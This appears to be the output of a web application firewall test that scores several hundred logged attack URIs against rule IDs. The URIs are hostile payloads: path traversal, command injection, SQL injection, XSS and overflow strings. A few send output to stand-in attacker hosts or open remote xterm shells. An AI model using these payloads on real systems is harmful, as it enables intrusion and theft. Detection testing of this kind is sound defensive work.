---------------------- Statistics of URIs analyzed------------------------
[933] input, [452] clean, [481] attacks
--------------------------- Analysis results -----------------------------
Packet [1]	Uri [/cgi-bin/phf?Qname=%0Acat%20/etc/passwd]	PLmin [1]	Score [15]	Nattacks [3]	[930120]	[932100]	[932160]
Packet [2]	Uri [/cgi-bin/phf?Qname=%0Acd%20/%0als]	PLmin [1]	Score [5]	Nattacks [1]	[932100]
Packet [3]	Uri [/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd]	PLmin [1]	Score [15]	Nattacks [3]	[930120]	[932100]	[932160]
Packet [5]	Uri [/admin.php3?step=4&option=pass&confirm=flow&newPssword=flow../../../../../../../../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [12]	Uri [/cgi-bin/w3-msql/protected-directory/.htpasswd]	PLmin [1]	Score [5]	Nattacks [1]	[930130]
Packet [18]	Uri [/cgi-bin/test.bat?&dir]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [19]	Uri [/cgi-bin/test.cmd?&dir]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [25]	Uri [/cgi-bin/guestbook.config]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [30]	Uri [/cgi-bin/wrap?/../../../../../etc]	PLmin [1]	Score [15]	Nattacks [2]	[930100]	[930110]
Packet [57]	Uri [/_private/download.log]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [58]	Uri [/_vti_pvt/users.pwd]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [59]	Uri [/_vti_pvt/administrators.pwd]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [60]	Uri [/_vti_bin/_vti_aut/dvwssr.dll]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [61]	Uri [/_vti_bin/_vti_aut/mtd2lv.dll]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [62]	Uri [/cgi-bin/nessus_is_probing_you_]	PLmin [1]	Score [5]	Nattacks [1]	[913120]
Packet [63]	Uri [/cybercop]	PLmin [1]	Score [5]	Nattacks [1]	[913120]
Packet [64]	Uri [/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [65]	Uri [/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/hosts%00]	PLmin [1]	Score [55]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [66]	Uri [/gaestebuch/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts%00]	PLmin [1]	Score [50]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [67]	Uri [/guestbook/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts%00]	PLmin [1]	Score [50]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [68]	Uri [/yabb/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts%00]	PLmin [1]	Score [50]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [69]	Uri [/cgi-bin/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts%00]	PLmin [1]	Score [50]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [79]	Uri [/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd]	PLmin [1]	Score [15]	Nattacks [3]	[930120]	[932100]	[932160]
Packet [80]	Uri [/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20evil.example.com:0]	PLmin [1]	Score [5]	Nattacks [1]	[932105]
Packet [82]	Uri [/cgi-bin/webplus?script=/../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [83]	Uri [/cgi-bin/webplus?script=/../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [85]	Uri [/filename.idq]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [86]	Uri [/filename.ida]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [88]	Uri [/query.idq?CiTemplate=../../../somefile.ext]	PLmin [1]	Score [35]	Nattacks [3]	[920440]	[930100]	[930110]
Packet [89]	Uri [/cgi-bin/pfdispaly.cgi?%27%0A/usr/bin/X11/xterm%20-display%20evil:0.0%7C%0D]	PLmin [1]	Score [10]	Nattacks [2]	[921150]	[932105]
Packet [99]	Uri [/cgi-local/SoftCart.exe%0D]	PLmin [1]	Score [5]	Nattacks [1]	[921190]
Packet [100]	Uri [/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini%0D]	PLmin [1]	Score [40]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [101]	Uri [/iissamples/exair/howitworks/codebrws.asp?source=/../../winnt/Profiles/Administrator/Application%20Data/Microsoft/Outlook%20Express/Mail/inbox.mbx%0D]	PLmin [1]	Score [35]	Nattacks [2]	[930100]	[930110]
Packet [102]	Uri [/_private/form_results.txt%0D]	PLmin [1]	Score [5]	Nattacks [1]	[921190]
Packet [103]	Uri [/cgi-bin/MachineInfo%0D]	PLmin [1]	Score [5]	Nattacks [1]	[921190]
Packet [104]	Uri [/carbo.dll?icatcommand=file_to_view&catalogname=catalog%0D]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [108]	Uri [/cgi-bin/filemail.pl%0D]	PLmin [1]	Score [5]	Nattacks [1]	[921190]
Packet [109]	Uri [/cgi-bin/nph-publish.cgi%0D]	PLmin [1]	Score [5]	Nattacks [1]	[921190]
Packet [112]	Uri [/cgi-dos/args.cmd?%22&any%2Bdos%2Bcommand%22%0D]	PLmin [1]	Score [10]	Nattacks [2]	[920440]	[921150]
Packet [113]	Uri [/cgi-dos/args.bat?%22&any%2Bdos%2Bcommand%22%0D]	PLmin [1]	Score [10]	Nattacks [2]	[920440]	[921150]
Packet [114]	Uri [/cgi-bin/day5datacopier.cgi?distloc=%3Bcat%20/etc/passwd%0D]	PLmin [1]	Score [15]	Nattacks [3]	[930120]	[932100]	[932160]
Packet [115]	Uri [/cgi-bin/day5datacopier.cgi?distloc=%3B/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh%0D]	PLmin [1]	Score [10]	Nattacks [2]	[932105]	[932160]
Packet [116]	Uri [/cgi-bin/perlshop.cgi%0D]	PLmin [1]	Score [5]	Nattacks [1]	[921190]
Packet [118]	Uri [//cgibin/htgrep/file=index.html&hdr=/etc/hosts%0D]	PLmin [1]	Score [5]	Nattacks [1]	[921190]
Packet [119]	Uri [/PSUser/PSCOErrPage.htm%0D]	PLmin [1]	Score [5]	Nattacks [1]	[921190]
Packet [120]	Uri [/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts%0D]	PLmin [1]	Score [40]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [121]	Uri [/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls]	PLmin [1]	Score [35]	Nattacks [3]	[930100]	[930110]	[932160]
Packet [122]	Uri [/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd%0D]	PLmin [1]	Score [45]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [123]	Uri [/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../../../../bin/cat%20ustorekeeper.pl%7C%0D]	PLmin [1]	Score [40]	Nattacks [3]	[930100]	[930110]	[932160]
Packet [124]	Uri [/CFDOCS/exampleapps/%0D]	PLmin [1]	Score [5]	Nattacks [1]	[921190]
Packet [125]	Uri [/cfdocs/exampleapp/email/getfile.cfm%0D]	PLmin [1]	Score [5]	Nattacks [1]	[921190]
Packet [126]	Uri [/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:%5Cboot.ini]	PLmin [1]	Score [5]	Nattacks [1]	[930120]
Packet [127]	Uri [/cfdocs/exampleapp/publish/admin/addcontent.cfm%0D]	PLmin [1]	Score [5]	Nattacks [1]	[921190]
Packet [129]	Uri [/components/AspUpload/Samples/DirectoryListing.asp%0D]	PLmin [1]	Score [5]	Nattacks [1]	[921190]
Packet [130]	Uri [/components/AspUpload/Samples/Test11.asp%0D]	PLmin [1]	Score [5]	Nattacks [1]	[921190]
Packet [131]	Uri [/components/AspUpload/Samples/UploadScript11.asp%0D]	PLmin [1]	Score [5]	Nattacks [1]	[921190]
Packet [132]	Uri [/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1%0D]	PLmin [1]	Score [40]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [136]	Uri [/crystalreportviewers/crystalimagehandler.aspx?dynamicimage=..%5C..%5Cboot.ini%0D]	PLmin [1]	Score [15]	Nattacks [2]	[930100]	[930120]
Packet [143]	Uri [/misc.php?do=page&template=%7B%24%7Bphpinfo%28%29%7D%7D%0D]	PLmin [1]	Score [10]	Nattacks [2]	[932130]	[933160]
Packet [144]	Uri [/misc.php?do=page&template=%7B%24%7Bsystem%28id%29%7D%7D]	PLmin [1]	Score [10]	Nattacks [2]	[932130]	[933160]
Packet [147]	Uri [/%20HTTP/1.0%0AHost:%20hades.ugr.es%0A%0A]	PLmin [1]	Score [5]	Nattacks [1]	[921190]
Packet [150]	Uri [/news.php?day=true&notice=-1%20UNION%20ALL%20SELECT%201%2C%27long%27%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C1]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [152]	Uri [/servlets/con%20fig/aplications/conf_ig.php?value=%20_&dynamic_value=..%5C..%5Cboot.ini%0]	PLmin [1]	Score [18]	Nattacks [3]	[920220]	[930100]	[930120]
Packet [153]	Uri [/_vti_inf.php?user_name=%20_friends&count=%27%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script]	PLmin [1]	Score [15]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [155]	Uri [/news/p-news.php?value=%20_&dynamic_value=..%5C..%5Cboot.ini%0]	PLmin [1]	Score [18]	Nattacks [3]	[920220]	[930100]	[930120]
Packet [157]	Uri [/PiIOrLma9uJV.pl?value=%20_&dynamic_value=..%5C..%5Cboot.ini%0]	PLmin [1]	Score [18]	Nattacks [3]	[920220]	[930100]	[930120]
Packet [160]	Uri [/PiIOrLma9uJV.asp?value=%20_&dynamic_value=..%5C..%5Cboot.ini%0]	PLmin [1]	Score [18]	Nattacks [3]	[920220]	[930100]	[930120]
Packet [163]	Uri [/PiIOrLma9uJV.inc]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [164]	Uri [/PiIOrLma9uJV.php?value=%20_&dynamic_value=..%5C..%5Cboot.ini%0]	PLmin [1]	Score [18]	Nattacks [3]	[920220]	[930100]	[930120]
Packet [165]	Uri [/NessusTest41.html]	PLmin [1]	Score [5]	Nattacks [1]	[913120]
Packet [168]	Uri [/cgi-bin/browse.php?value=%20_&dynamic_value=..%5C..%5Cboot.ini%0]	PLmin [1]	Score [18]	Nattacks [3]	[920220]	[930100]	[930120]
Packet [169]	Uri [/cgi-bin/p-news.php?value=%20_&dynamic_value=..%5C..%5Cboot.ini%0]	PLmin [1]	Score [18]	Nattacks [3]	[920220]	[930100]	[930120]
Packet [170]	Uri [/filemgr/browse.php?value=%20_&dynamic_value=..%5C..%5Cboot.ini%0]	PLmin [1]	Score [18]	Nattacks [3]	[920220]	[930100]	[930120]
Packet [173]	Uri [/scripts/browse.php?value=%20_&dynamic_value=..%5C..%5Cboot.ini%0]	PLmin [1]	Score [18]	Nattacks [3]	[920220]	[930100]	[930120]
Packet [175]	Uri [/intranet/browse.php?value=%20_&dynamic_value=..%5C..%5Cboot.ini%0]	PLmin [1]	Score [18]	Nattacks [3]	[920220]	[930100]	[930120]
Packet [176]	Uri [/NessusTest18467.html]	PLmin [1]	Score [5]	Nattacks [1]	[913120]
Packet [177]	Uri [/database/philboard.mdb]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [179]	Uri [/error/NonExistent.html?configure=../../../../../../../../etc/passw]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [180]	Uri [/%7Eroot/NonExistent.html?configure=../../../../../../../../etc/passw]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [181]	Uri [/usage/NonExistent.html?configure=../../../../../../../../etc/passw]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [182]	Uri [/cgi-bin/PiIOrLma9uJV.pl?value=%20_&dynamic_value=..%5C..%5Cboot.ini%0]	PLmin [1]	Score [18]	Nattacks [3]	[920220]	[930100]	[930120]
Packet [184]	Uri [/cgi-bin/spin_client.cgi?configure=../../../../../../../../etc/passw]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [185]	Uri [/scripts/spin_client.cgi?configure=../../../../../../../../etc/passw]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [186]	Uri [/cgi-bin/NonExistent.html?configure=../../../../../../../../etc/passw]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [188]	Uri [/cgi-bin/PiIOrLma9uJV.cgi?configure=../../../../../../../../etc/passw]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [189]	Uri [/cgi-bin/PiIOrLma9uJV.inc]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [190]	Uri [/cgi-bin/PiIOrLma9uJV.php?configure=../../../../../../../../etc/passw]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [192]	Uri [/cgi-bin/PiIOrLma9uJV.php3?configure=../../../../../../../../etc/passw]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [194]	Uri [/.%22./.%22./winnt/win.ini%20.pl]	PLmin [1]	Score [5]	Nattacks [1]	[930110]
Packet [195]	Uri [/forum/database/philboard.mdb]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [196]	Uri [/cgi-bin/database/philboard.mdb]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [197]	Uri [/scripts/database/philboard.mdb]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [199]	Uri [/way-board/way-board.cgi?db=/etc/passwd%00]	PLmin [1]	Score [20]	Nattacks [3]	[920270]	[930120]	[932160]
Packet [202]	Uri [/cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00]	PLmin [1]	Score [20]	Nattacks [3]	[920270]	[930120]	[932160]
Packet [203]	Uri [/scripts/way-board/way-board.cgi?db=/etc/passwd%00]	PLmin [1]	Score [20]	Nattacks [3]	[920270]	[930120]	[932160]
Packet [208]	Uri [/shoutbox.php?conf=../../../../../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [209]	Uri [/fcgi-bin/echo?foo=%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E]	PLmin [1]	Score [15]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [210]	Uri [/fcgi-bin/echo2?foo=%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E]	PLmin [1]	Score [15]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [212]	Uri [/cgi-bin/shoutbox.php?conf=../../../../../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [213]	Uri [/scripts/shoutbox.php?conf=../../../../../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [214]	Uri [/fcgi-bin/echo.exe?foo=%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E]	PLmin [1]	Score [15]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [215]	Uri [/fcgi-bin/echo2.exe?foo=%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E]	PLmin [1]	Score [15]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [217]	Uri [/examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/system/autoexec.ncf]	PLmin [1]	Score [15]	Nattacks [2]	[930100]	[930110]
Packet [218]	Uri [/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [219]	Uri [/cgi-bin/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [220]	Uri [/scripts/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [226]	Uri [/cgi-bin/hello.bat?&dir%2Bc:]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [227]	Uri [/cgi-bin/echo.bat?&dir%2Bc:%5C]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [230]	Uri [/cd/../config/html/cnf_gi.htm]	PLmin [1]	Score [5]	Nattacks [1]	[930100]
Packet [231]	Uri [/crystalreportviewers/crystalimagehandler.aspx?dynamicimage=..%5C..%5C..%5C..%5C..%5Cmydocuments%5Cprivate%5Cpasswords.txt]	PLmin [1]	Score [10]	Nattacks [1]	[930100]
Packet [232]	Uri [/cgi-bin/htsearch?Exclude=%60/etc/passwd%60]	PLmin [1]	Score [15]	Nattacks [3]	[930120]	[932105]	[932160]
Packet [234]	Uri [/cgi-bin/sojourn.cgi?cat=../../../../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [235]	Uri [/ows-bin/%2A.bat?&%5C%5Cattacker%5Cgetadmin.bat]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [255]	Uri [/cgi-bin/search/show.pl?url=http://192.168.0.1]	PLmin [1]	Score [5]	Nattacks [1]	[931100]
Packet [257]	Uri [/cgi-bin/search/show.pl?url=ftp://192.168.0.1]	PLmin [1]	Score [5]	Nattacks [1]	[931100]
Packet [259]	Uri [/cgi-bin/search/show.pl?url=file:/etc/passwd]	PLmin [1]	Score [10]	Nattacks [2]	[930120]	[932160]
Packet [261]	Uri [/cgi-bin/math_sum.mscgi?a=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&b=]	PLmin [1]	Score [20]	Nattacks [4]	[941100]	[941110]	[941160]	[941180]
Packet [262]	Uri [/sresult.exe?cam=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E]	PLmin [1]	Score [20]	Nattacks [4]	[941100]	[941110]	[941160]	[941180]
Packet [264]	Uri [/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=%3Bls%7Cmail%20attacker%40attacker-host%7C&f6=%5Ea.%2A&action=searchdbdisplay]	PLmin [1]	Score [5]	Nattacks [1]	[932100]
Packet [274]	Uri [/ultraboard.pl?action=PrintableTopic&Post=../../filename.ext%5C000]	PLmin [1]	Score [35]	Nattacks [2]	[930100]	[930110]
Packet [275]	Uri [/it/?cmd=%00%04%24%00%10%00%00%04%24%00%10%00%00%04%24%00%00%00%00%5D%21%00%00%00%02%00%00%00%40D%00W%11%00%00%00d5%00%00%00%00d%25%00%00%00%00%00f?MZt%08%00%10%00%00W%3C%01f:PEuZx%01s%0C%01%3Ekernt%08%3EKERNu%7E%04el32t%09%7E%04EL32ud%05%00%00%00%00%04%0E%04%00%00%02%00%00%03%00%00%1E%04%00%00s%02%00%00%03%00%00]	PLmin [1]	Score [10]	Nattacks [1]	[920270]
Packet [276]	Uri [/it/?cmd=%00%04%24%00%10%00%00%04%24%00%10%00%00%04%24%00%00%00%00%5D%21%00%00%00%02%00%00%00C%00W%11%00%00%00d5%00%00%00%00d%25%00%00%00%00%00f?MZt%08%00%10%00%00W%3C%01f:PEuZx%01s%0C%01%3Ekernt%08%3EKERNu%7E%04el32t%09%7E%04EL32ud%05%00%00%00%00%04%0E%04%00%00%02%00%00%03%00%00%1E%04%00%00s%02%00%00%03%00%00]	PLmin [1]	Score [10]	Nattacks [1]	[920270]
Packet [277]	Uri [/it/?cmd=%00%04%24%00%10%00%00%04%24%00%10%00%00%04%24%00%00%00%00%5D%21%00%00%00%02%00%00%00C%00W%11%00%00%00d5%00%00%00%00d%25%00%00%00%00%00f?MZt%08%00%10%00%00W%3C%01f:PEuZx%01s%0C%01%3Ekernt%08%3EKERNu%7E%04el32t%09%7E%04EL32ud%05%00%00%00%00%04%0E%04%00%00%02%00%00%03%00%00%1E%04%00%00s%02%00%00%03%00%00]	PLmin [1]	Score [10]	Nattacks [1]	[920270]
Packet [278]	Uri [/it/?cmd=%00%04%24%00%10%00%00%04%24%00%10%00%00%04%24%00%00%00%00%5D%21%00%00%00%02%00%00%00%10D%00W%11%00%00%00d5%00%00%00%00d%25%00%00%00%00%00f?MZt%08%00%10%00%00W%3C%01f:PEuZx%01s%0C%01%3Ekernt%08%3EKERNu%7E%04el32t%09%7E%04EL32ud%05%00%00%00%00%04%0E%04%00%00%02%00%00%03%00%00%1E%04%00%00s%02%00%00%03%00%00]	PLmin [1]	Score [10]	Nattacks [1]	[920270]
Packet [279]	Uri [/it/?cmd=%00%04%24%00%10%00%00%04%24%00%10%00%00%04%24%00%00%00%00%5D%21%00%00%00%02%00%00%00%10D%00W%11%00%00%00d5%00%00%00%00d%25%00%00%00%00%00f?MZt%08%00%10%00%00W%3C%01f:PEuZx%01s%0C%01%3Ekernt%08%3EKERNu%7E%04el32t%09%7E%04EL32ud%05%00%00%00%00%04%0E%04%00%00%02%00%00%03%00%00%1E%04%00%00s%02%00%00%03%00%00]	PLmin [1]	Score [10]	Nattacks [1]	[920270]
Packet [280]	Uri [/it/?cmd=%00%04%24%00%10%00%00%04%24%00%10%00%00%04%24%00%00%00%00%5D%21%00%00%00%02%00%00%00%40D%00W%11%00%00%00d5%00%00%00%00d%25%00%00%00%00%00f?MZt%08%00%10%00%00W%3C%01f:PEuZx%01s%0C%01%3Ekernt%08%3EKERNu%7E%04el32t%09%7E%04EL32ud%05%00%00%00%00%04%0E%04%00%00%02%00%00%03%00%00%1E%04%00%00s%02%00%00%03%00%00]	PLmin [1]	Score [10]	Nattacks [1]	[920270]
Packet [287]	Uri [/scripts/w3who.dll?bogus=%3Cscript%3Ealert%28%22Hello%22%29%3C/script%3E]	PLmin [1]	Score [20]	Nattacks [4]	[920440]	[941100]	[941110]	[941160]
Packet [288]	Uri [/scripts/w3who.dll?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [289]	Uri [/filename%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [290]	Uri [/_vti_pvt/services.pwd]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [291]	Uri [/_vti_pvt/administrators.pwd]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [292]	Uri [/cgi-bin/calendar_admin.pl?config=%7Ccat%20/etc/passwd%7C]	PLmin [1]	Score [15]	Nattacks [3]	[930120]	[932100]	[932160]
Packet [293]	Uri [/scripts/calendar_admin.pl?config=%7Ccat%20/etc/passwd%7C]	PLmin [1]	Score [15]	Nattacks [3]	[930120]	[932100]	[932160]
Packet [294]	Uri [/calendar_admin.pl?config=%7Ccat%20/etc/passwd%7C]	PLmin [1]	Score [15]	Nattacks [3]	[930120]	[932100]	[932160]
Packet [295]	Uri [/awstats/awstats.pl?configdir=%7C/bin/ls%7C]	PLmin [1]	Score [15]	Nattacks [3]	[932100]	[932150]	[932160]
Packet [299]	Uri [/cgi-bin/awstats.pl?update=1&logfile=%7C/bin/ls%7C]	PLmin [1]	Score [15]	Nattacks [3]	[932100]	[932150]	[932160]
Packet [302]	Uri [/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [303]	Uri [/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat%3C/var/spool/mail/login%3E%3E/etc/passwd]	PLmin [1]	Score [15]	Nattacks [3]	[930120]	[932100]	[932160]
Packet [307]	Uri [/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00]	PLmin [1]	Score [20]	Nattacks [3]	[920270]	[930120]	[932160]
Packet [308]	Uri [/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../directory]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [314]	Uri [/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [323]	Uri [/global.asa%2B.htr]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [324]	Uri [/active.log]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [330]	Uri [/cgi-bin/results.jsp?query=%22%3E%3Cscript%3Efoo%3C/script%3E%22]	PLmin [1]	Score [15]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [331]	Uri [/scripts/results.jsp?query=%22%3E%3Cscript%3Efoo%3C/script%3E%22]	PLmin [1]	Score [15]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [332]	Uri [/results.jsp?query=%22%3E%3Cscript%3Efoo%3C/script%3E%22]	PLmin [1]	Score [15]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [347]	Uri [/search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/passwd&ResultStyle=simple&ResultCount=20&collection=books]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [348]	Uri [/servlet/Sygate.Servlet.login?uid=%27%3bupdate%20CMS35%2eAdmin%20set%20Password%3dcast%28%27AA%27%20as%20varbinary%29%20%2d%2d%20&up=foo]	PLmin [1]	Score [10]	Nattacks [2]	[942350]	[942360]
Packet [349]	Uri [/servlet/Sygate.Servlet.login?uid=%27%3bupdate%20CMS35%2eAdmin%20set%20Password%3dcast%28%27AA%27%20as%20varbinary%29%20%2d%2d%20&up=foo]	PLmin [1]	Score [10]	Nattacks [2]	[942350]	[942360]
Packet [351]	Uri [/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini]	PLmin [1]	Score [35]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [352]	Uri [/msadc/Samples/SELECTOR/ViewCode.asp?source=/msadc/Samples/../../../../../boot.ini]	PLmin [1]	Score [35]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [353]	Uri [/msadc/Samples/SELECTOR/CodeBrws.asp?source=/../../winnt/Profiles/Administrator/Application%20Data/Microsoft/Outlook%20Express/Mail/inbox.mb]	PLmin [1]	Score [35]	Nattacks [2]	[930100]	[930110]
Packet [354]	Uri [/msadc/Samples/SELECTOR/Winmsdp.exe?source=/msadc/Samples/../../../../../boot.ini]	PLmin [1]	Score [35]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [362]	Uri [/it/services/help/?show=about&module=%3B%22.passthru%28%22hola%22%29%3B%27]	PLmin [1]	Score [5]	Nattacks [1]	[933160]
Packet [363]	Uri [/it/services/help/?show=about&module=%3B%22.passthru%28%22amigo%22%29%3B%27]	PLmin [1]	Score [5]	Nattacks [1]	[933160]
